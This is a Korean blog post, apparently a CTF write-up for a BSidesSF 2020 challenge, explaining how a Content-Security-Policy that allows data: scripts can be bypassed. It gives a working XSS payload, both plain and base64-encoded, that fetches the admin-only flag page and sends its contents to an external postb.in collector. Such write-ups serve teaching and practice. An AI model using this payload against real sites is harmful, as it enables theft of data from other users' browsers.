문제 개요
https://csp-1-5aa1f221.challenges.bsidessf.net
input과 submit이 있고, admin으로 /csp-one-flag를 읽으면 되는 간단한 챌린지.
문제 상황
개발자도구로 응답 헤더의 CSP제약조건을 확인해본다.
content-security-policy:
script-src 'self' data:;
default-src 'self';
connect-src *;
report-uri /csp_report
참고 https://developers.google.com/web/fundamentals/security/csp?hl=ko
script-src 'self' data:;
script에 대해 'self' 즉 출처가 현재 자신의 페이지인 것과, data:는 허용하겠다.
문제의 키 포인트 : data:를 허용하는 것.
data: 란?
참고 : https://hyeonseok.com/soojung/webstandards/2011/02/17/641.html
data scheme은 외부 데이터를 URI형태로 표현할 수 있는 방식.
이런 파일들을 아래와 같이 base64인코딩하여 페이지 내에서 사용할 수 있다.

여기서 중요한 점은 javascript또한 data scheme형식으로 표현이 가능하다는 것.
<script src="data:text/javascript;base64,YWxlcnQoMSk=">1</script>
위 스크립트 코드를 챌린지에 입력하게 되면 alert(1)이 실행되는 것을 볼 수 있다.
문제풀이
해당 스크립트가 어드민에게 전달되기 때문에, /csp-one-flag를 접속하고 해당 response를 자신의 서버로 전달하는 스크립트를 짜면 문제를 풀 수 있다.
<script>
fetch("https://csp-1-5aa1f221.challenges.bsidessf.net/csp-one-flag")
.then(r => r.text())
.then(t => fetch("https://postb.in/1582733980565-7314624455757?flag="+t))
</script>
fetch를 이용해서 스크립트를 짜서 postbin으로 전송하는 스크립트이다.
이제 위 스크립트 내용부분을 base64인코딩을 해서 data scheme형식으로 표현한다.
<script src="data:text/javascript;base64,ICBmZXRjaCgiaHR0cHM6Ly9jc3AtMS01YWExZjIyMS5jaGFsbGVuZ2VzLmJzaWRlc3NmLm5ldC9jc3Atb25lLWZsYWciKQogIC50aGVuKHIgPT4gci50ZXh0KCkpCiAgLnRoZW4odCA9PiBmZXRjaCgiaHR0cHM6Ly9wb3N0Yi5pbi8xNTgyNzMzOTgwNTY1LTczMTQ2MjQ0NTU3NTc/ZmxhZz0iK3QpKQ==">1</script>
해당 페이로드를 챌린지에 입력하고 전송하게 되면 postbin으로 flag가 전송된다.
'Security > Web' 카테고리의 다른 글
[Spamandhex 2020 Teaser] Journey #1 (XSS, Webauthn) (0) | 2020.05.15 |
---|---|
[SharkyCTF] XXExternalXX write-up (XXE) (0) | 2020.05.11 |
[버그바운티 write-ups] GitLab Path Traversal 취약점 (0) | 2020.05.07 |
[버그바운티 write-ups] OTP Verification bypass (0) | 2020.04.25 |
[BSidesSF 2020 CTF] Recipes Write-up (0) | 2020.03.02 |